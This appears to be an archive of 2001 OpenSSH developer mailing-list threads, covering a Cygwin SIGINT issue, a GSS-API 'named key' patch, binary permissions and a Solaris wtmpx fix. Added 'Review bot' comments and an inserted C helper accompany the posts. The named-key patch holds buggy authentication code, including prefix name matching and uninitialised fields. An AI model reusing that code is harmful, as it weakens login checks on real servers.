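    printf("race reproduced and fixed: %s\n", demo_race() == 1 ? "yes" : "no");
    printf("stuck child handled:       %s\n", demo_stuck_child() == 1 ? "yes" : "no");
    return 0;
}
```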
From: scrosby at belcan.com (Scott Crosby)
Date: Thu, 28 Jun 2001 09:31:10 -0400
Subject: OpenSSH, Cygwin, eXceed, and SIGINT
Message-ID: <2DC4449D1872D311916600105AA0A2FD01DDF318@imaptech.belcan.com>

Gert,

Both ISIG and ICANON are being cleared (both with and without X11
forwarding enabled) via enter_raw_mode() in sshtty.c. The part that
perplexes me is that the bug only shows up when X11 forwarding is
enabled. Any ideas?

-----Original Message-----
From: Gert Doering [mailto:gert at greenie.muc.de]
Sent: Wednesday, June 27, 2001 5:36 PM
To: Scott Crosby; 'openssh-unix-dev at mindrot.org'
Subject: Re: OpenSSH, Cygwin, eXceed, and SIGINT

Hi,

On Wed, Jun 27, 2001 at 01:48:43PM -0400, Scott Crosby wrote:
> When logging into an HP-UX 10.2 system from a Windows NT machine
> running Cygwin and openssh 2.9p2, control-c sends a sigint to the ssh client
> on the NT system, thus killing the ssh process. Interestingly enough, this
> behavior is only observed when using X11 forwarding. I can eliminate the
> behavior by changing clientloop.c to ignore SIGINT (signal(SIGINT, SIG_IGN)
> ) but then I'm back to the old behavior of the remote shell ignoring SIGINT.

If the client were running on a unix machine, I'd say that the "ISIG"
and/or "ICANON" flags of the tty control structure are not cleared (thus
making the local terminal handler interpret ctrl-c and generate a SIGINT).

As this is Cygwin, I have no idea, never used this, and I have no idea
whether they have POSIX tty "things" (POSIX termios structure, and
underlying logic).

gert
-- 
USENET is *not* the non-clickable part of WWW!
                                                           //www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert at greenie.muc.de
fax: +49-89-35655025                        gert.doering at physik.tu-muenchen.de

From jan.suchanek at informatik.uni-ulm.de Thu Jun 28 23:33:52 2001
From: jan.suchanek at informatik.uni-ulm.de (Jan Suchanek)
Date: Thu, 28 Jun 2001 15:33:52 +0200
Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?]
Message-ID: <3B3B3240.A10ECA75@informatik.uni-ulm.de>

Hello!

> That leaves the question about a "cleaner" solution to this effect.
> After first sending the bug report, I received private mails indicating,
> that this effect has also been seen on Linux, so it is not a pure HP-problem.

That's right; the problem appears on Linux as well. I have tried even the
new snapshots in which the problem should be fixed - without success.
Now I tried the "Lutz-bugfix" and it works on Linux, too.

Greetings,
Jan
-- 
Jan Suchanek, Universitaet Ulm, URG, Fakultaet fuer Informatik, 89069 Ulm, Germany
Raum: O27/243  Tel.: +49/(0)731-5024205, Fax: +49/(0)731-5024202

From gert at greenie.muc.de Thu Jun 28 23:41:47 2001
From: gert at greenie.muc.de (Gert Doering)
Date: Thu, 28 Jun 2001 15:41:47 +0200
Subject: OpenSSH, Cygwin, eXceed, and SIGINT
In-Reply-To: <2DC4449D1872D311916600105AA0A2FD01DDF318@imaptech.belcan.com>; from Scott Crosby on Thu, Jun 28, 2001 at 09:31:10AM -0400
References: <2DC4449D1872D311916600105AA0A2FD01DDF318@imaptech.belcan.com>
Message-ID: <20010628154147.M15538@greenie.muc.de>

Hi,

On Thu, Jun 28, 2001 at 09:31:10AM -0400, Scott Crosby wrote:
> Both ISIG and ICANON are being cleared (both with and without x11
> forwarding enabled,) via enter_raw_mode() in sshtty.c. The part that
> perplexes me is that the bug only shows up when x11 forwarding is enabled.
> Any ideas?

Maybe the termios structure is reset to "saved" values somewhere? (I
didn't look into the code, just guessing).

If that's true, it should also appear on Linux, unless X11 forwarding has
special cygwin code...

gert
-- 
USENET is *not* the non-clickable part of WWW!
                                                           //www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert at greenie.muc.de
fax: +49-89-35655025                        gert.doering at physik.tu-muenchen.de

From Nicolas.Williams at ubsw.com Fri Jun 29 06:57:14 2001
From: Nicolas.Williams at ubsw.com (Nicolas Williams)
Date: Thu, 28 Jun 2001 16:57:14 -0400
Subject: Adding 'name' key types
Message-ID: <20010628165713.L9416@sm2p1386swk.wdr.com>

Playing around with the [wonderful] GSS-API patches for OpenSSH [1] I
noticed that there is a bit of functionality missing from
OpenSSH/GSS-API, namely that authorized_keys2 has no meaning when using
GSS authentication.

Yes, ~/.k5login can be used to grant access to an account for
applications that support Kerberos, as does OpenSSH with those GSS
patches, but .k5login does not and cannot provide the
from/command/environment and other useful options that SSH's
authorized_keys2 file entries can.

So, after looking around, especially in key.h and key.c and auth2.c, it
occurred to me that a new key type could be added for dealing with named
keys, that is, names which can be authenticated (e.g., certificate
names, Kerberos principal names).

The neat thing is that auth2.c:user_key_allowed() is key-type
independent (so arguably it doesn't belong in auth2.c), and thus could
be called from ssh_gssapi_userok() [instead of, or in addition to the
GSS mechanism specific *userok() methods].

The only questions, in my mind, are

 - how to format key names for use in authorized_keys2?

   I propose starting the key blob with 'name:' followed by a possibly
   null mechanism name, another ':' and the key name in question
   (uuencoded so whitespace, non-ascii characters and so on can be
   unambiguously present in key names).

 - how to deal with generic names vs. mechanism specific names?

   I.e., should an 'exported' GSS name be checked as a 'gss' key name
   type? Or should it be checked against a name type specific to the
   mechanism used to authenticate the client?

   I think this should probably be optional behaviour.

[1] http://www.sxw.org.uk/computing/patches/

Thoughts? Flames?

Nico
-- 
.
Visit our website at http://www.ubswarburg.com

This message contains confidential information and is intended only for the individual named.
If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. This message is provided for informational purposes and should not be construed as a solicitation or offer to buy or sell any securities or related financial instruments. From dbt at meat.net Fri Jun 29 12:21:59 2001 
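The entry format Nico proposes above, as an added example that is not part of his posting, of OpenSSH or of the GSS-API patches: a matcher for an authorized_keys2 token of the form name:<mechanism>:<base64 name> that decodes the name and compares both it and the mechanism exactly. The single-token layout, the 512-byte name limit and the assumption that any from=/command= options have already been split off (as user_key_allowed() does for ordinary keys) are mine; the decoder implements plain base64, which is what OpenSSH's uuencode()/uudecode() produce, and the sample entries are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Decode base64 (the encoding OpenSSH's uuencode()/uudecode() use) into
 * out.  Stops at NUL or whitespace so a trailing comment on the line is
 * ignored.  Returns the decoded length, or -1 on a bad character, bad
 * padding, or output that would not fit.
 */
static int b64_decode(const char *in, unsigned char *out, size_t outsz)
{
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    unsigned int acc = 0;
    int bits = 0;
    size_t n = 0;

    for (; *in != '\0' && *in != '=' && !isspace((unsigned char)*in); in++) {
        const char *p = strchr(tbl, *in);

        if (p == NULL)
            return -1;
        acc = (acc << 6) | (unsigned int)(p - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outsz)
                return -1;
            out[n++] = (unsigned char)(acc >> bits);
            acc &= (1u << bits) - 1;        /* keep only the leftover bits */
        }
    }
    while (*in == '=')
        in++;
    return (*in == '\0' || isspace((unsigned char)*in)) ? (int)n : -1;
}

/*
 * Check one authorized_keys2 token of the proposed form
 *     name:<mechanism>:<base64 name>
 * against the name the server has just authenticated.  Returns 1 if the
 * entry authorises (mech, name), 0 if it does not, -1 if the entry is
 * malformed.  An empty <mechanism> accepts any mechanism, as the proposal
 * allows; a non-empty one must match exactly, so "krb5" never matches
 * "krb5x".  The name is compared by length and bytes, never as a C string,
 * so a decoded name may contain whitespace, non-ASCII or NUL bytes.
 */
int named_entry_allows(const char *entry, const char *mech,
    const unsigned char *name, size_t name_len)
{
    const char *mech_start, *b64;
    unsigned char decoded[512];         /* assumed upper bound on a name */
    size_t mech_len;
    int dlen;

    if (strncmp(entry, "name:", 5) != 0)
        return -1;
    mech_start = entry + 5;
    b64 = strchr(mech_start, ':');
    if (b64 == NULL)
        return -1;
    mech_len = (size_t)(b64 - mech_start);
    dlen = b64_decode(b64 + 1, decoded, sizeof(decoded));
    if (dlen <= 0)                      /* garbage, or an empty name */
        return -1;
    if (mech_len != 0 &&
        (mech_len != strlen(mech) || memcmp(mech_start, mech, mech_len) != 0))
        return 0;
    if ((size_t)dlen != name_len || memcmp(decoded, name, name_len) != 0)
        return 0;
    return 1;
}

int main(void)
{
    /* Constructed sample entry: base64("someuser@SOMEREALM") plus a comment. */
    const char *entry = "name:krb5:c29tZXVzZXJAU09NRVJFQUxN nico";
    const unsigned char who[] = "someuser@SOMEREALM";
    size_t who_len = sizeof(who) - 1;

    printf("krb5  -> %d\n", named_entry_allows(entry, "krb5", who, who_len));
    printf("krb5x -> %d\n", named_entry_allows(entry, "krb5x", who, who_len));
    return 0;
}
```

Plugged into a user_key_allowed()-style loop, the -1 result should be logged and the line skipped rather than treated as a mismatch, so a typo in an entry is visible to the administrator instead of silently denying a login.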
From: dbt at meat.net (David Terrell)
Date: Thu, 28 Jun 2001 19:21:59 -0700
Subject: FW: poor permissions on ssh binary
In-Reply-To: <791BD3CB503DD411A6510008C7CF647701F40C34@col-581-exs01.cist.saic.com>; from GILBERT.R.LOOMIS@saic.com on Tue, Jun 19, 2001 at 10:14:17AM -0400
References: <791BD3CB503DD411A6510008C7CF647701F40C34@col-581-exs01.cist.saic.com>
Message-ID: <20010628192159.A23931@pianosa.catch22.org>

On Tue, Jun 19, 2001 at 10:14:17AM -0400, Loomis, Rip wrote:
> Advantages of 0711 perms:
> 1. Doesn't allow non-privileged users to read
> the installed binaries (which could
> be used to run strings against them to
> find out compiled options, etc.)

unprivileged users can probably still do this by attaching to the running
process with a debugger, if they really want to know. Or through observing
deterministic behavior.

> 2. Doesn't allow non-privileged users to copy
> the installed binaries to other systems
> or locations (the copied binaries could
> then *potentially* be directly modified
> or trojaned--but this is highly unlikely
> in today's world).
> 3. System administrators can still copy the
> installed binaries to other systems or
> locations.

System administrators who like to su you mean.

> Note that I don't think that those advantages
> are particularly amazing, and in fact any
> bad guy who wants to do something evil with
> OpenSSH would just start with the source.
> However, the binaries run just fine with the
> current permissions, and there's this important
> security concept called Least Privilege--which
> I'll explain in this case as "one shouldn't go
> around giving users or processes powers that
> they don't absolutely require, because one can't
> always predict future bugs and exposures."

As a system administrator, I like being able to do as little as root as
possible. Being able to ship ssh binaries from one machine to another
without having to su just to get them is one way to reduce that.
There's no security hole in making non-setuid or setuid binaries readable
that I know of. If there are, then those holes should be fixed.

-- 
David Terrell            | "My question is, if a mime types, isn't
dbt at meat.net            |  that kinda cheating?"
http://wwn.nebcorp.com/  |     - Jason Zych

From iseki at ksp.nis.nec.co.jp Fri Jun 29 12:30:16 2001
From: iseki at ksp.nis.nec.co.jp (Takefumi Iseki)
Date: Fri, 29 Jun 2001 11:30:16 +0900
Subject: wtmpx problem on Solaris 8 sparcv9 (64bit) environment
Message-ID: <200106291130.AHI47431.FJLJT@ksp.nis.nec.co.jp>

Hello

When I was using OpenSSH-2.9p2 in a Solaris 8 sparcv9 (64-bit) environment,
I found that wtmpx gets broken. The utmpx structure becomes larger in the
sparcv9 environment than in the 32-bit environment. Therefore it is better
to use the futmpx structure instead of the utmpx structure; in the sparcv9
environment, futmpx is used instead of utmpx.

The system is as follows.

OpenSSH Version: 2.9p2
OS:
% uname -a
SunOS foo 5.8 Generic_108528-06 sun4u sparc SUNW,UltraSPARC-IIi-cEngine
% isainfo -v
64-bit sparcv9 applications
32-bit sparc applications

Please look at the reference.

% cat utmptest.c
#include <stdio.h>
#include <utmp.h>
#include <utmpx.h>

/*
 * Print the in-memory sizes of struct utmp/utmpx next to the on-disk
 * (futmp/futmpx) layouts; on this system they differ only in the 64-bit
 * build.  sizeof() is a size_t, so cast before printing it.
 */
int
main(void)
{
	struct utmp utmp;
	struct futmp futmp;
	struct utmpx utmpx;
	struct futmpx futmpx;

	printf("utmp: %lu, futmp: %lu / utmpx: %lu, futmpx: %lu\n",
	    (unsigned long)sizeof(utmp), (unsigned long)sizeof(futmp),
	    (unsigned long)sizeof(utmpx), (unsigned long)sizeof(futmpx));
	return 0;
}
% cc utmptest.c
% ./a.out
utmp: 36, futmp: 36 / utmpx: 372, futmpx: 372
% cc -xarch=v9 utmptest.c
% ./a.out
utmp: 40, futmp: 36 / utmpx: 384, futmpx: 372

Following is a patch for the "openssh-2.9p2/loginrec.c" file.

diff -Naur openssh-2.9p2.org/loginrec.c openssh-2.9p2.cast/loginrec.c
--- openssh-2.9p2.org/loginrec.c Wed May 9 05:34:33 2001
+++ openssh-2.9p2.cast/loginrec.c Thu Jun 28 11:06:22 2001
@@ -887,7 +891,11 @@ /* write a utmpx entry with the system's help (pututxline() and pals) */ # ifdef UTMPX_USE_LIBRARY static int +#ifdef __sparcv9 +utmpx_write_library(struct logininfo *li, struct utmpx *utx) +#else utmpx_write_library(struct logininfo *li, struct utmpx *utx) +#endif { setutxent(); pututxline(utx); @@ -902,7 +910,11 @@ /* write a utmp entry direct to the file */ static int +#ifdef __sparcv9 +utmpx_write_direct(struct logininfo *li, struct futmpx *utx) +#else utmpx_write_direct(struct logininfo *li, struct utmpx *utx) +#endif { log("utmpx_write_direct: not implemented!"); return 0; @@ -1144,7 +1156,11 @@ /* write a wtmpx entry direct to the end of the file */ /* This is a slight modification of code in OpenBSD's logwtmp.c */ static int +#ifdef __sparcv9 +wtmpx_write(struct logininfo *li, struct futmpx *utx) +#else wtmpx_write(struct logininfo *li, struct utmpx *utx) +#endif { struct stat buf; int fd, ret = 1; @@ -1167,6 +1183,24 @@ return ret; } +#ifdef __sparcv9 +void +utmpx_to_futmpx(struct utmpx *utx, struct futmpx *futx) +{ + strncpy(futx->ut_user, utx->ut_user, sizeof(futx->ut_user)); + strncpy(futx->ut_id, utx->ut_id, sizeof(futx->ut_id)); + strncpy(futx->ut_line, utx->ut_line, sizeof(futx->ut_line)); + futx->ut_pid = (pid32_t)utx->ut_pid; + futx->ut_type = (int16_t)utx->ut_type; + futx->ut_exit.e_termination = (int16_t)utx->ut_exit.e_termination; + futx->ut_exit.e_exit = (int16_t)utx->ut_exit.e_exit; + futx->ut_tv.tv_sec = (time32_t)utx->ut_tv.tv_sec; + futx->ut_tv.tv_usec = (int32_t)utx->ut_tv.tv_usec; + futx->ut_session = (int32_t)utx->ut_session; + futx->ut_syslen = (int16_t)utx->ut_syslen; + strncpy(futx->ut_host, utx->ut_host, sizeof(futx->ut_host)); +} +#endif static int wtmpx_perform_login(struct logininfo *li) 
@@ -1174,7 +1208,15 @@ struct utmpx utx; construct_utmpx(li, &utx); +#ifdef __sparcv9 + { + struct futmpx futx; + utmpx_to_futmpx(&utx , &futx); + return wtmpx_write(li, &futx); + } +#else return wtmpx_write(li, &utx); +#endif } @@ -1184,7 +1226,16 @@ struct utmpx utx; construct_utmpx(li, &utx); - return wtmpx_write(li, &utx); +#ifdef __sparcv9 + { + struct futmpx futx; + utmpx_to_futmpx(&utx , &futx); + return wtmpx_write(li, &futx); + } +#else + return wtmpx_write(li, &utx); +#endif + } @@ -1207,7 +1258,11 @@ /* Return true if this wtmpx entry indicates a login */ static int +#ifdef __sparcv9 +wtmpx_islogin(struct logininfo *li, struct futmpx *utx) +#else wtmpx_islogin(struct logininfo *li, struct utmpx *utx) +#endif { if ( strncmp(li->username, utx->ut_name, MIN_SIZEOF(li->username, utx->ut_name)) == 0 ) { @@ -1226,7 +1281,11 @@ wtmpx_get_entry(struct logininfo *li) { struct stat st; +#ifdef __sparcv9 + struct futmpx utx; +#else struct utmpx utx; +#endif int fd, found=0; /* Clear the time entries */ @@ -1245,7 +1304,11 @@ } /* Seek to the start of the last struct utmpx */ +#ifdef __sparcv9 + if (lseek(fd, (off_t)(0-sizeof(struct futmpx)), SEEK_END) == -1 ) { +#else if (lseek(fd, (off_t)(0-sizeof(struct utmpx)), SEEK_END) == -1 ) { +#endif /* probably a newly rotated wtmpx file */ close(fd); return 0; @@ -1275,7 +1338,11 @@ # endif continue; } +#ifdef __sparcv9 + if (lseek(fd, (off_t)(0-2*sizeof(struct futmpx)), SEEK_CUR) == -1) { +#else if (lseek(fd, (off_t)(0-2*sizeof(struct utmpx)), SEEK_CUR) == -1) { +#endif close (fd); return 0; } From Darren.Moffat at eng.sun.com Sat Jun 30 01:57:46 2001 
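Review bot: the new #ifdef __sparcv9 in the utmpx_write_library() hunk (@@ -887,7 +891,11 @@) is a no-op, both branches declare `utmpx_write_library(struct logininfo *li, struct utmpx *utx)`; drop the conditional there, since pututxline() takes a struct utmpx in either word size and libc writes the file format. Elsewhere in the patch __sparcv9 is the compiler's architecture macro and struct futmpx exists only on Solaris, while loginrec.c is the portable file, so the selection should be keyed on a configure-time feature test (a HAVE_FUTMPX-style macro, name illustrative) rather than on the target CPU.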
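Review bot: utmpx_to_futmpx() (@@ -1167,6 +1183,24 @@) never initialises the destination, so every byte of struct futmpx it does not explicitly assign, padding included, is written to wtmpx as whatever happened to be on the stack; add `memset(futx, 0, sizeof(*futx));` as the first statement. The function is also global with no prototype; it is only used from this file, so mark it `static`.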
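Review bot: the wtmpx_perform_login() hunk (@@ -1174,7 +1208,15 @@) and the unnamed hunk right after it (@@ -1184,7 +1226,16 @@) add the same conversion block twice and format it differently: the first keeps `return wtmpx_write(li, &utx);` as the #else context, the second deletes and re-adds that line and leaves a stray blank line before the closing brace. Use one form in both, or better move the utmpx-to-futmpx step inside wtmpx_write() so both callers stay as they were and the #ifdef lives in one place.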
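Review bot: wtmpx_get_entry() (@@ -1226,7 +1281,11 @@) now declares `struct futmpx utx` on sparcv9 and the two lseek() hunks after it (@@ -1245,7 +1304,11 @@ and @@ -1275,7 +1338,11 @@) are adjusted to the smaller record, but the read() that fills utx inside that loop is not part of the patch; if it still passes sizeof(struct utmpx), 384 bytes by the test program above, into the 372-byte structure it overruns the stack. Write the read size and both seek offsets as sizeof(utx); that also removes the three #ifdefs, because the expression follows the declaration.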
From: Darren.Moffat at eng.sun.com (Darren Moffat)
Date: Fri, 29 Jun 2001 08:57:46 -0700 (PDT)
Subject: wtmpx problem on Solaris 8 sparcv9 (64bit) environment
Message-ID: <200106291558.f5TFwhU843593@jurassic.eng.sun.com>

>When I was using OpenSSH-2.9p2 in Solaris 8 sparcv9 (64bit)
>environment, I found some trouble that wtmpx has broken.

Why are you building 64bit binaries for ssh ? This will gain you nothing
and there is no reason to do so. 32bit binaries run just fine on a 64bit
kernel (most of Solaris is still 32bit binaries even when running a 64bit
kernel).

There are currently only 4 reasons to compile userland binaries 64bit
rather than 32bit:

1. The process needs greater than 4Gb address space
2. Need for a 64bit time_t ie need to process times past 2038
3. Direct access to kernel memory when running a 64bit kernel
4. Need to control a 64bit process via /proc (ie you are a debugger).

None of the ssh programs fall into these categories. You can do 64bit
maths without building a 64bit binary and you can get UltraSPARC
performance improvements on 32bit binaries - in fact in general 32bit
binaries perform better than 64bit ones.

If you are compiling with -xarch=v9 in an attempt to gain the performance
benefits of the UltraSPARC platform then this isn't what you are getting.
In fact all it will do is hurt your performance since you will waste
valuable cache space - bigger bits does NOT mean faster.

-xarch=v9 means build a 64bit binary
-xtarget=ultra will give you a 32bit binary optimized for UltraSPARC.

I don't believe that this patch is necessary.

-- 
Darren J Moffat

From Nicolas.Williams at ubsw.com Sat Jun 30 08:09:06 2001
From: Nicolas.Williams at ubsw.com (Nicolas Williams) Date: Fri, 29 Jun 2001 18:09:06 -0400 Subject: Adding 'name' key types In-Reply-To: <20010628165713.L9416@sm2p1386swk.wdr.com>; from willian on Thu, Jun 28, 2001 at 04:57:14PM -0400 References: <20010628165713.L9416@sm2p1386swk.wdr.com> Message-ID: <20010629180904.J6936@sm2p1386swk.wdr.com> Here's a patch to OpenSSH + GSS patches that implements the below. I can now put this in authorized_keys2 files: ssh-ext-named:krb5 !someuser at SOMEREALM It works well so far. Cheers, Nico Index: 2_9_p2_w_gss_and_krb5.4/key.h --- 2_9_p2_w_gss_and_krb5.4/key.h Tue, 26 Jun 2001 16:27:13 -0400 willian (OpenSSH/j/7_key.h 1.2 644) +++ 2_9_p2_w_gss_krb5_named_keys.1/key.h Fri, 29 Jun 2001 18:00:47 -0400 willian (OpenSSH/j/7_key.h 1.3 644) @@ -35,7 +35,8 @@ KEY_RSA, KEY_DSA, KEY_NULL, - KEY_UNSPEC + KEY_UNSPEC, + KEY_NAME }; enum fp_type { SSH_FP_SHA1, @@ -49,6 +50,9 @@ int type; RSA *rsa; DSA *dsa; + u_char *name; + u_int name_len; + char *name_type; }; Key *key_new(int type); Index: 2_9_p2_w_gss_and_krb5.4/key.c --- 2_9_p2_w_gss_and_krb5.4/key.c Tue, 26 Jun 2001 16:27:13 -0400 willian (OpenSSH/j/8_key.c 1.2 644) +++ 2_9_p2_w_gss_krb5_named_keys.1/key.c Fri, 29 Jun 2001 18:00:47 -0400 willian (OpenSSH/j/8_key.c 1.3 644) @@ -56,6 +56,8 @@ k->type = type; k->dsa = NULL; k->rsa = NULL; + k->name = NULL; + k->name_len = NULL; switch (k->type) { case KEY_RSA1: case KEY_RSA: @@ -72,6 +74,7 @@ dsa->pub_key = BN_new(); k->dsa = dsa; break; + case KEY_NAME: case KEY_UNSPEC: break; default: @@ -119,6 +122,11 @@ DSA_free(k->dsa); k->dsa = NULL; break; + case KEY_NAME: + if (k->name != NULL) + xfree(k->name); + k->name_len = 0; + break; case KEY_UNSPEC: break; default: @@ -130,8 +138,9 @@ int key_equal(Key *a, Key *b) { - if (a == NULL || b == NULL || a->type != b->type) + if (a == NULL || b == NULL || a->type != b->type) { return 0; + } switch (a->type) { case KEY_RSA1: case KEY_RSA: 
@@ -146,6 +155,17 @@ BN_cmp(a->dsa->g, b->dsa->g) == 0 && BN_cmp(a->dsa->pub_key, b->dsa->pub_key) == 0; break; + case KEY_NAME: + if ((a->name_type == NULL && b->name_type == NULL) || + (a->name_type == b->name_type)) + return (a->name_len == b->name_len) && + (memcmp(a->name, b->name, a->name_len) == 0); + if (a->name_type == NULL || b->name_type == NULL) + return 0; + if (strncmp(a->name_type, b->name_type, strlen(b->name_type)) == 0) + return (a->name_len == b->name_len) && + (memcmp(a->name, b->name, a->name_len) == 0); + break; default: fatal("key_equal: bad key type %d", a->type); break; @@ -160,7 +180,7 @@ EVP_MD_CTX ctx; u_char *blob = NULL; u_char *retval = NULL; - int len = 0; + u_int len = 0; int nlen, elen; *dgst_raw_length = 0; @@ -363,11 +383,12 @@ { Key *k; int success = -1; - char *cp, *space; + char *cp, *space, *name_type; int len, n, type; u_int bits; - u_char *blob; + u_char *blob = NULL; + name_type = NULL; cp = *cpp; switch(ret->type) { @@ -390,6 +411,7 @@ case KEY_UNSPEC: case KEY_RSA: case KEY_DSA: + case KEY_NAME: space = strchr(cp, ' '); if (space == NULL) { debug3("key_read: no space"); @@ -397,6 +419,17 @@ } *space = '\0'; type = key_type_from_name(cp); + if (type == KEY_NAME) { + char * colon = NULL; + + colon = strchr(cp, ':'); + + debug3("key_read: handling typed named key, %s, colon at %x", cp, colon); + if (colon != NULL && *(++colon) != '\0') { + name_type = xstrdup(colon); + } else + name_type == NULL; + } *space = ' '; if (type == KEY_UNSPEC) { debug3("key_read: no key found"); 
@@ -414,26 +447,60 @@ debug3("key_read: type mismatch"); return 0; } - len = 2*strlen(cp); - blob = xmalloc(len); - n = uudecode(cp, blob, len); - if (n < 0) { - error("key_read: uudecode %s failed", cp); - return -1; + if (ret->type == KEY_NAME && *cp == '!') { + cp++; + space = strchr(cp, '\n'); + if (space != NULL) + *space = '\0'; + debug3("key_read: reading named key %s", cp); + k = key_new(ret->type); + k->name = (unsigned char *) xstrdup(cp); + k->name_len = strlen(cp); + k->name_type = name_type; + *space = '\n'; + } else { + len = 2*strlen(cp); + blob = xmalloc(len); + n = uudecode(cp, blob, len); + if (n < 0) { + error("key_read: uudecode %s failed", cp); + return -1; + } + if (ret->type == KEY_NAME) { + debug3("key_read: reading uuencoded key %s", blob); + k = key_new(ret->type); + k->name = blob; + k->name_len = strlen(blob); + k->name_type = name_type; + } + else { + k = key_from_blob(blob, n); + } } - k = key_from_blob(blob, n); if (k == NULL) { error("key_read: key_from_blob %s failed", cp); return -1; } - xfree(blob); + if (blob != NULL) + xfree(blob); if (k->type != type) { error("key_read: type mismatch: encoding error"); key_free(k); return -1; } /*XXXX*/ - if (ret->type == KEY_RSA) { + if (ret->type == KEY_NAME) { + /* + if (ret->name != NULL) + xfree(ret->name); + */ + ret->name = k->name; + ret->name_len = k->name_len; + ret->name_type = k->name_type; + k->name = NULL; + k->name_len = 0; + success = 1; + } else if (ret->type == KEY_RSA) { if (ret->rsa != NULL) RSA_free(ret->rsa); ret->rsa = k->rsa; @@ -487,7 +554,7 @@ } } else if ((key->type == KEY_DSA && key->dsa != NULL) || (key->type == KEY_RSA && key->rsa != NULL)) { - int len, n; + u_int len, n; u_char *blob, *uu; key_to_blob(key, &blob, &len); uu = xmalloc(2*len); 
@@ -498,6 +565,19 @@ } xfree(blob); xfree(uu); + } else if (key->type == KEY_NAME && key->name != NULL && + key->name_len) { + int n; + u_char *blob, *uu; + uu = xmalloc(2*(key->name_len)); + blob = xstrdup(key->name); + n = uuencode(blob, key->name_len, uu, key->name_len); + if (n > 0) { + fprintf(f, "%s %s", key_ssh_name(key), uu); + success = 1; + } + xfree(blob); + xfree(uu); } return success; } @@ -514,6 +594,9 @@ case KEY_DSA: return "DSA"; break; + case KEY_NAME: + return "Named"; + break; } return "unknown"; } @@ -527,6 +610,9 @@ case KEY_DSA: return "ssh-dss"; break; + case KEY_NAME: + return "ssh-ext-named"; + break; } return "ssh-unknown"; } @@ -604,6 +690,11 @@ BN_copy(n->rsa->n, k->rsa->n); BN_copy(n->rsa->e, k->rsa->e); break; + case KEY_NAME: + n->name_len = k->name_len; + n->name = xmalloc(k->name_len); + memcpy(n->name, k->name, n->name_len); + break; default: fatal("key_from_private: unknown type %d", k->type); break; @@ -624,6 +715,11 @@ return KEY_RSA; } else if (strcmp(name, "ssh-dss") == 0){ return KEY_DSA; + } else if (strcmp(name, "ssh-ext-named") == 0){ + return KEY_NAME; + } else if (strncmp(name, "ssh-ext-named:", strlen("ssh-ext-named:")) == 0){ + debug3("key_type_from_name: got a typed named key type: %s", name); + return KEY_NAME; } else if (strcmp(name, "null") == 0){ return KEY_NULL; } Index: 2_9_p2_w_gss_and_krb5.4/gss-serv.c --- 2_9_p2_w_gss_and_krb5.4/gss-serv.c Tue, 26 Jun 2001 16:27:13 -0400 willian (OpenSSH/l/25_gss-serv.c 1.1 644) +++ 2_9_p2_w_gss_krb5_named_keys.1/gss-serv.c Fri, 29 Jun 2001 18:00:47 -0400 willian (OpenSSH/l/25_gss-serv.c 1.2 644) 
@@ -124,27 +124,41 @@ * Returns true if the user is OK to log in, otherwise returns 0 */ +static char name_type_name[5] = "krb5"; + int ssh_gssapi_krb5_userok(char *name) { krb5_principal princ; - int retval; + int retval, retval2; + Key k; if (ssh_gssapi_krb5_init() == 0) return 0; + k.type = KEY_NAME; + k.name = gssapi_client_name.value; + k.name_len = strlen(gssapi_client_name.value); + k.name_type = name_type_name; + + debug3("ssh_gssapi_krb5_userok:"); + debug3("ssh_gssapi_krb5_userok: %s", k.name_type); + if ((retval=krb5_parse_name(krb_context, gssapi_client_name.value, &princ))) { log("krb5_parse_name(): %.100s", krb5_get_err_text(krb_context,retval)); return 0; } + + retval2 = user_key_allowed(getpwnam(name), &k); + if (krb5_kuserok(krb_context, princ, name)) retval = 1; else retval = 0; krb5_free_principal(krb_context, princ); - return retval; + return retval | retval2; } /* Make sure that this is called _after_ we've setuid to the user */ On Thu, Jun 28, 2001 at 04:57:14PM -0400, Nicolas Williams wrote: > > Playing around with the [wonderful] GSS-API patches for OpenSSH [1] I > noticed that there is a bit of functionality missing from > OpenSSH/GSS-API, namely that authorized_keys2 has no meaning when using > GSS authentication. > > Yes, ~/.k5login can be used to grant access to an account for > applications that support Kerberos, as does OpenSSH with those GSS > patches, but .k5login does not and cannot provide the > from/command/environment and other useful options that SSH's > authorized_keys2 file entries can. > > So, after looking around, especially in key.h and key.c and auth2.c, it > occurred to me that a new key type could be added for dealing with named > keys, that is, names which can be authenticated (e.g., certificate > names, Kerberos principal names). 
> 
> The neat thing is that auth2.c:user_key_allowed() is key-type
> independent (so arguably it doesn't belong in auth2.c), and thus could
> be called from ssh_gssapi_userok() [instead of, or in addition to the
> GSS mechanism specific *userok() methods].
> 
> The only questions, in my mind, are
> 
> - how to format key names for use in authorized_keys2?
> 
> I propose starting the key blob with 'name:' followed by a possibly
> null mechanism name, another ':' and the key name in question
> (uuencoded so whitespace, non-ascii characters and so on can be
> unambiguously present in key names).
> 
> - how to deal with generic names vs. mechanism specific names?
> 
> I.e., should an 'exported' GSS name be checked as a 'gss' key name
> type? Or should it be checked against a name type specific to the
> mechanism used to authenticate the client?
> 
> I think this should probably be optional behaviour.
> 
> 
> [1] http://www.sxw.org.uk/computing/patches/
> 
> 
> Thoughts? Flames?
> 
> Nico
> -- 
> 
> .
-- 
.
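Review bot: in the key_new() hunk (key.c, @@ -56,6 +56,8 @@) `k->name_len = NULL;` assigns a pointer constant to a u_int; write `k->name_len = 0;`. The new name_type member is not initialised here at all, so key_equal() and key_free() see an indeterminate pointer on any KEY_NAME built with key_new(); add `k->name_type = NULL;`.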
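Review bot: key_free() (@@ -119,6 +122,11 @@) frees k->name but not k->name_type, which key_read() allocates with xstrdup(), so every parsed ssh-ext-named:<type> entry leaks its type string; free it there and reset both pointers to NULL alongside name_len.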
